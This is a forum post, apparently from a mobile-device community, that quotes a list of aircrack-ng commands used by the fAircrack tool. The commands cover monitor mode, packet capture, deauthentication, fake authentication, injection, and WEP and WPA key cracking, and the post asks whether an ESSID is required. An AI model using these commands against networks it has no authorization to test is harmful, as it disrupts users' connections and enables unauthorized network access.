View Single Post
Mr Wolf's Avatar
Posts: 84 | Thanked: 22 times | Joined on Nov 2011 @ Italy
#1124
Originally Posted by StefanL View Post
Yes, fAircrack implements this on the Monitor Tab using the Enable Injection button.


No, fAircrack uses ifconfig, iwconfig commands to put wlan0 into monitor / managed mode.
Code:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode Monitor
sudo ifconfig wlan0 up
fAircrack uses for capture
Code:
sudo airodump-ng --channel X --bssid BSSID --write FILE wlan0
for deauthentication
Code:
sudo aireplay-ng -0 10 -a BSSID wlan0
for authentication
Code:
sudo aireplay-ng -1 5 -q 10 -a BSSID -h MYMAC wlan0
for injection
Code:
sudo aireplay-ng -3 -b BSSID -h MYMAC wlan0
for interactive injection (since v0.46)
Code:
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSID -h MYMAC wlan0
to crack WEP key
Code:
aircrack-ng -l KEYFILE CAPFILES
to crack WPA key using wordlist
Code:
aircrack-ng WORDLIST -l KEYFILE CAPFILES
to search for APs and clients
Code:
sudo airodump-ng -w FILE wlan0
Many thanks!
I've just noticed a thing: shouldn't it be:

aireplay-ng -1 0 -e [AP ESSID] -a [AP BSSID] -h [N900 MAC Address] wlan0

I mean, you must specify AP ESSID (name)?

I wrote once in Aircrack forum (look at the bottom):
http://forum.aircrack-ng.org/index.p...=3309.msg18601
asking why it was necessary specify network name, and they answered me it was part of the standards.
In fact, if ESSID is hidden, you must find it, first.
__________________
I'm Winston Wolf, I solve problems